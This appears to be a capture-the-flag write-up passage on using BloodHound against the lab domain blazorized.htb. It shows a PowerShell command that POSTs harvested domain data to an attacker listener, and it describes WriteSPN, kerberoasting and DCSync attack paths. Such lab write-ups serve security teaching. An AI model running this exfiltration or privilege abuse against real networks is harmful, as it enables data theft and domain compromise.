BloodHound


BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.

Ingestion


Although there already is an existing PowerShell session open from the initial foothold, SharpHound has been executed as part of the adPEAS script

Since file transfer over SMB is not possible, I will use a simple Python script that support the POST method to transfer the ingested domain data file

This.

PS C:\tmp> iwr -Uri 'http://10.10.14.110:2222' -Method POST -InFile blazorized.htb_20240702081301_BloodHound.zip

Transferred

Received

Prep


Ingested domain data uploaded

nu_1055


The nu_1055 account has WriteSPN privilege over the rsa_4810 account, essentially kerberoasting This was also picked up by adPEAS earlier

rsa_4810


The rsa_4810 account is part of both Remote Management Users and Remote_Support_Administrators groups. The user is able to WinRM to the dc1.blazorized.htb host

ssa_6010


The ssa_6010 account has memberships to BUILTIN\Remote Management Users and BLAZORIZED\Super_Support_Administrators groups

The ssa_6010 account also has DCSync, GetChangeAll, GetChanges privileges from the membership to the Super_Support_Administrators group